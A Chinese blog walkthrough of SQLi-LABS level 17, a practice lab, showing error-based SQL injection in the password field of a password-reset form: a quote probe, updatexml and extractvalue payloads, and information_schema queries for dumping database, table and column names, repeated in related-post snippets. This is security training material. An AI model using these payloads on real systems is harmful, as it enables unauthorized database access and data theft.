SQLi LABS Less 17 报错注入

已于 2022-04-03 16:19:15 修改
阅读量1.5w 收藏 4
点赞数 9
分类专栏: SQLi-LABS 靶场通关教程 文章标签: 安全 网络安全
于 2021-06-22 21:52:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangyuxiang946/article/details/118118155
版权

第十七关单引号字符型注入 ,推荐使用报错注入。

一、功能分析

这关是一个修改密码的功能,先查询用户名是否正确。

  • 如果用户名正确,后台就修改密码,并提示修改成功;
  • 如果用户名错误,页面就直接返回修改失败;

二、思路分析

用户名被过滤,注入点在密码处,这意味着我们需要事先知道一个正确的用户名(盲猜 admin)。

用户名正确的前提下:

  1. 密码携带单引号,页面显示数据库的报错信息,适合报错注入。
  2. 万能密码登录成功,页面不动态显示查询结果(返回写死的图片),不适合联合注入。

三、解题步骤

方式一:报错注入

参考文章:报错注入使用详解,原理+步骤+实战教程

第一步、判断注入点

用户名输入:admin

密码输入:a'

页面显示数据库的报错信息,分析可知,注入点为单引号字符型注入。

第二步、判断报错条件

用户名输入:admin

密码输入:a' and updatexml(1,0x7e,3) -- a

 页面显示报错函数的内容,确定报错注入可用。

第三步、脱库

获取当前使用的数据库,用户名输入:admin

密码输入:

a' and updatexml(1,
	concat(0x7e,
		substr(
			(database())
		,1,32)
	)
,3) -- a

执行结果:

其余脱库操作时,将下图圈中的 部分替换成SQL语句即可:

 

 常用的脱库语句:

# 获取所有数据库
select group_concat(schema_name)
from information_schema.schemata
 
# 获取 security 库的所有表
select group_concat(table_name)
from information_schema.tables
where table_schema="security"
 
# 获取 users 表的所有字段
select group_concat(column_name)
from information_schema.columns
where table_schema="security" and table_name="users"
士别三日wyx
关注
  • 9
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
Sqlilabs Less-17
Light_inthe_eyes的博客
03-07 121
PASSWORD RESET提醒此关可能是password的注入。查看源码,发现逻辑是需要先证明用户存在才能重置密码,既然我们知道admin用户,就直接注入吧。 判断是单引号字符型注入,无回显,用报错注入: uname=admin&passwd=abc'#&submit=Submit 爆库: uname=admin&passwd=abc'+and+extractvalue(1,concat(0x5c,(select+database())))#&submit=Submit
sqlilabs过关手册注入天书,过关sqlliabs的绝佳手册
06-28
Sqli-labs安装需要安装以下环境 apache+mysql+php Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改sql-connections/db-creds.inc文件当中...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqlilabs过关手册注入天书.pdf
09-14
sqlilabs过关手册注入天书.pdf
sql 注入sqli-labs/less-5 双注入,也称:报错注入
最新发布
没有故事
03-03 957
模板:select * from user where id=1 and (updatexml("任意字符", concat(0x7e,模板:select * from user where id =1 and (extractvalue(1,concat(0x7e,,0x7e),"任意字符"));该关卡返回正确或者错误页面,还有错误的代码,所以可以使用报错注入。limit 0,1 limit 1,1 limit 5,1 分别查出字段名。0x3c,0x68,0x72,0x2f,0x3e : 换行符。
sqlilabs过关手册注入天书
08-17
sqlilabs过关手册注入天书
mysql注入-sqlilabs靶场注入
10-15
sqlilabs靶场全部关卡的详细解析,pdf文档
最新版Phpstudy安装sql注入平台(sqli-labs)错误解决方法
知足且坚定,温柔且上进
03-08 2449
网上安装sqli-labs位置及修改的教程有一大堆,但是进入到了浏览器页面,点击Setup/reset Database for labs选项就会报错,虽然网上提供了关于phpstudy 5.x版本和7.x版本的修改办法,但是仍会出现一些参数警告或其他问题,其实根本的解决办法就是根据自己的PHPstudy的版本安装相对于的sqli-labs。 如果你的PHP study的版本是最新版7.x~下载新...
sqli-labs (less-17)
kukudeshuo的博客
03-11 280
sqli-labs (less-17) 进入17关,我们发现17关与前面关卡有所不同,他是要我们输入用户名然后修改密码,我们这里把密码依然改为admin等进去试试 我们继续利用hackbar抓取POST的内容,抓取后我们判断注入点。作者试了很多次,17关输入用户名的位置是没有注入点的,所以我们在更改密码的位置判断注入点 输入 uname=admin&passwd=admin'&submit=Submit #有完整错误回显 所以这里我们使用报错注入攻击 查看当前数据库 uname=adm
Sqli-labs之Less-17
m0_46315342的博客
06-04 591
                                          &nbs...
floor报错注入的两种格式
aitong的博客
01-31 429
联合查询 http://127.0.0.1/sqli-labs/less-6/?id=1" union select null,count(*),concat((select group_concat(table_name) from information_schema.tables where table_schema=database()),floor(rand(0)*2))x from users group by x--+ 其中1是因为联合查询列数要相同所以补个1,换成null也可以 users可
SQLI-LABS Less-17
Web学习之路
03-24 101
Update注入
SQLi-labs(Less-17
weixin_41182861的博客
08-01 155
Less-17 POST - Update Query- Error Based - String 在username中输入任何测试符号都无济于事。查看源码,后端对uname有过滤: function check_input($value) { if(!empty($value)) //检测这个形参是否为空。 { // truncation (see comments) $value = substr($value,0,15); //分割一串字符串的效果, 第二个参数是从第0个
sqli-labs/Less-17
m0_71299382的博客
11-18 142
sqli-labs第十七关
sqlilabs less-17
TA不懒,但还没有添加简介
07-05 218
sqlilabs less-17
sqli-labs-Less-17
giun的博客
02-13 490
这一关与密码有关,我们尝试下报错 输入username:admin password=1' 故对密码处理时应该使用“ 报错注入 username:admin password:1'and extractvalue(1,concat(0x7e,(select version()),0x7e))# version()可以换成其他语句进行注入 延时注入 username:admin pass...
sqli-labs (less 17)
Xi4or0uji
08-01 468
less 17 报错函数注入 在开始放出payload之前,可能要先稍微提一下 从后台源码可以看出,uname有个check_input函数过滤,但是passwd没有,所以注入点是在passwd上面 接下来还要看下extractvalue这个报错函数 这里推荐一下官方的解释和一篇讲得简单点的博客 https://dev.mysql.com/doc/refman/5.7/en/xml-f...
Sqlilabs Less 17 Post - Update Query - Error Based - String
baynk的博客
03-14 294
Sqlilabs Less 17 Post - Update Query - Error Based - String 手工注入 在用户名后加字符只会显示下面的图片 在密码后加字符有报错,说明是以'来进行闭合的 不论怎么尝试,只要用户名是正确的,都只有这张图,所以只能用报错注入(子注入可以,也就是Less-5的那种,基于时间的盲注也行,基于布尔的不可以)来完成的,但是这些前面都用过了,这里就...
sqli-labs ————less -17
Fly_鹏程万里
05-12 849
Less-17源代码如下:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head&..
sqlilabs靶场搭建报错
10-07
靶场搭建报错可能有多种原因,根据提供的引用内容,主要有两个可能的原因。第一个原因是sqli-labs文件夹没有正确解压到phpstudy_pro\WWW目录下,并且没有更名为sqli。请确保sqli-labs-master.zip已经解压到了正确的目录,并且文件夹名称为sqli。第二个可能的原因是数据库密码没有正确配置。请打开db-creds.inc文件,将dbpass的值改为自己的数据库密码。如果问题依然存在,可以尝试将php版本改为更低的版本,例如7.3.4版本。这个版本可能比较容易出错。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

士别三日wyx

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值